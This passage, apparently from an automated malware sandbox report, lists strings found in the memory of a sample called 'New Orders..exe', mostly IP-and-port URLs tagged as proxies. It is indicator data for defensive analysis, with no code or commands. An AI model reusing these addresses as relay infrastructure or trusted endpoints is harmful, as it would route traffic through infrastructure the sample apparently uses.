                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:27836://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:6522
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.117.179.179:6522://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.30.231:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.12.31.3:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.81:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.125.222.81:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.137:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.126.169.137:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.135.255:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.128.135.255:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25C4A000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.134.80.222:3129
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD253CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.134.80.222:3129://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.138.87.238:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.200
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.200://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.139.11.200:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.144.30.232:443
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25C85000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.147.201.125:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.147.201.125:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.150.25.132:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.150.25.132:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.150.23:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.159.189.244:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.1:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.162.132.1:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.248.19:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.174.248.19:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.97.90:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.176.97.90:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.60:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.60:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.75:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.178.133.75:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.181.123.145:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.181.123.145:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.155.3:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.184.155.3:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD253DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.185.163.111:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD253E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.185.163.111:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.186.106.159:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.186.106.159:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.118.92:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.189.118.92:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.78.50:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.190.78.50:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.1
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.186:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.191.75.186:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.195.149.79:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.195.149.79:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.67:5432
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.148.67:5432://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.134:5432
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.134:5432://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.84:5432
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.196.151.84:5432://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.201.134.38:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.201.134.38:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.20.68:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.20.68:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.247.102
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.247.102://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD259CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.224.247.102:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.204.8:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.225.204.8:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.0.2:4153
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.226.0.2:4153://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.147.209:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.235.25:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2640C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.228.235.25:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.10.98:8402
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.10.98:8402://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25AA5000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25AE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.229.34.174:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.230.49.2:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.232.79.0:9292
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.232.79.0:9292://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.169.40:9994
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.233.169.40:9994://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.100.112:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.100.112:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.60.3:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.60.3:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.61.173:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.234.61.173:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.123.45:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.235.123.45:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.198.249:666
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.236.198.249:666://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.238.12.4:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.240.182.120:1975
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.240.182.120:1975://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.252.79.48:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.252.79.48:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.5.117.76:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.5.117.76:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.56.220.210:59920
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.56.220.210:59920://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.60.186.208:27488
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.60.186.208:27488://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.187.67:4009://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.188.134:44499
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.61.188.134:44499://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.137.2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.137.218:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.137.218:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.138.48:999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.138.48:999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.65.18:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.65.65.18:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.24.102:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.7.24.102:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.42:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.70.206.42:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.184.134:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.71.184.134:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.108.208:9050
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.108.208:9050://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2518E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.111.135:15082
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.111.135:15082://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.99.122:20473
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.77.99.122:20473://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.134.7
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.134.70:19065
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.79.134.70:19065://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.21.43:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.8.21.43:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.225.94:30001
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.225.94:30001://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.1
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:14669
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:14669://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:17639
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:17639://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.81.232.17:23711
